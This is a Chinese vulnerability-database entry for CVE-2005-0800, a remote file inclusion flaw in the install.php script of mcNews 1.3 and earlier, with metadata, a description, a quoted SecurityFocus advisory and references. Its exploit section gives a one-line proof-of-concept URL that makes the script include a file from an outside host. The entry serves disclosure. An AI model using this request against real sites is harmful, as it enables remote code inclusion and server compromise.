McNews install.php远程任意文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108543 漏洞类型 输入验证
发布时间 2005-03-17 更新时间 2006-09-28
CVE编号 CVE-2005-0800 CNNVD-ID CNNVD-200505-756
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-756
|漏洞详情
mcNews是一套允许用户在WEB上张贴新闻的脚本系统,可运行在Linux和Unix操作系统上,也可运行在MicrosoftWindows操作系统下。mcNews中存在远程文件包含漏洞,漏洞的起因是应用程序无法正确的过滤用户对install.php脚本所提供的输入,这样攻击者就可以在输入中包含任意文件,导致跨站脚本等攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/12835/info

mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.

This issue is reported to affect mcNews versions 1.3 and prior. 

http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
|参考资料

来源:BUGTRAQ
名称:20050317PHPmcNewsarbitraryfileinclusion
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111108900102438&w=2
来源:XF
名称:mcnews-install-file-include(19726)
链接:http://xforce.iss.net/xforce/xfdb/19726
来源:BID
名称:12835
链接:http://www.securityfocus.com/bid/12835
来源:BUGTRAQ
名称:20060906mcNewsv1.3-RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/445606/100/0/threaded
来源:SECUNIA
名称:14528
链接:http://secunia.com/advisories/14528